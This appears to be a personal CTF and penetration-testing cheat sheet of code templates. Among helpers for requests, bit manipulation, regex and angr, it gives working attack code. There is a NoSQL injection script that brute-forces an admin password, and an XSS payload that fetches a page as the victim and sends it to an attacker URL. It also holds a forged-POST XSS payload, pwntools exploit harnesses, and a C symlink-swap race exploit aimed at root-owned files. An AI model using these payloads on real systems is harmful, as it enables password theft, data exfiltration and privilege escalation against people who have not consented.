Templates

2 minute read

Web

Do a web request, set the session and send some data:

import requests
import re

http_proxy  = "http://127.0.0.1:8080"
proxyDict = { 
              "http"  : http_proxy, 
            }
 # get a session
r = requests.get('http://')
# send request
r = requests.post('<url>', data={'key': 'value'}, cookies={'PHPSESSID': r.cookies['PHPSESSID']} , proxies=proxyDict)

Bruteforce value on nosql/mongo db injection:

import requests
import re
import string

http_proxy  = "http://127.0.0.1:8080"
proxyDict = { 
              "http"  : http_proxy, 
            }

url = "<url>/?search=admin"

done = False
pos = 0
key = ""
while not done:
  found = False
  for _, c in enumerate(string.digits+string.ascii_lowercase+'-'):
    payload = url + "' %26%26 this.password.match(/^"+key+c+".*$/)%00"
    r = requests.get(payload, proxies=proxyDict)
    if "admin</a>" in r.text:   
      found = True  
      key += c    
      print key 
      break
  if not found:
    print "Done."
    break 
  pos += 1

Python

Take a bit string and do some manipulation on individual bits:

# Convert bit string to byte array
def bitstring_to_bytes(s):
    v = int(s, 2)
    b = bytearray()
    while v:
        b.append(v & 0xff)
        v >>= 8
    return bytes(b[::-1])

base = "010101..." # the bit string
n = 8 # change something every n bits
result = ""
# Iterate over bitstring, doing something  every n bits
for i in xrange(n,len(base)-n,n):
	# do manipulation here
	result += num
print(bitstring_to_bytes(result))

Named capture groups in python:

m = re.search('[e]\s:\s(?P<e>\d+){0,1}',text.decode('utf-8'))
  if m != None and 'e' in m.groupdict():
    e = int(m.group('e'))

XSS

XSS web request on behalf of victim and send complete webpage back to us:

xmlhttp = new XMLHttpRequest();
xmlhttp.onload = function() {
  x = new XMLHttpRequest();
  x.open("GET", '<our_url>?'+xmlhttp.response);
  x.send(null);
}
xmlhttp.open("GET", '<target_url>');
xmlhttp.send(null);

XSS post request on behalf of the victim, with custom cookies:

var xhr = new XMLHttpRequest();
document.cookie = "key=value;";
var uri ="<target uri>";
xhr = new XMLHttpRequest();
xhr.open("POST", uri, true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.send("<post body>");

Reversing

Solve for a basic block in angr:

import angr
import sys

def main(argv):
  path_to_binary = "<binary>"
  project = angr.Project(path_to_binary)
  initial_state = project.factory.entry_state()
  sm = project.factory.simgr(initial_state)
  # list of basic blocks to find or to avoid
  sm.explore(find=[], avoid=[])  
  for state in sm.deadended:
    print(state.posix.dumps(sys.stdin.fileno()))
  else:
    raise Exception('Could not find the solution')
  
if __name__ == '__main__':
  main(sys.argv)

Exploits

Execute program over ssh:

#!/usr/bin/python
from pwn import *

s =  ssh(host='', user='', password='')
p = s.run('cd <path> && ./<vuln>')
p.recv()
p.sendline(<payload>)
p.interactive()
s.close()

Extract value after a certain string with pwntools:

get = lambda x: [sh.recvuntil('{} : '.format(x)), int(sh.recvline())][1]
p = get('p')

Use LD_PRELOAD with pwntools:

libc = ELF(<name>)
main = ELF(<name>)
r = main.process(env={'LD_PRELOAD' : libc.path})

Machine Learning

Plotting

Misc

Exploit race condition on linux by swapping file paths between 2 files very quickly (normal file, symlink to root owned file, swap, swap ,swap):

#define _GNU_SOURCE
#include <stdio.h>
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <linux/fs.h>

int main(int argc, char *argv[]) {
  while (1) {
    syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);
  }
  return 0;
}

Updated: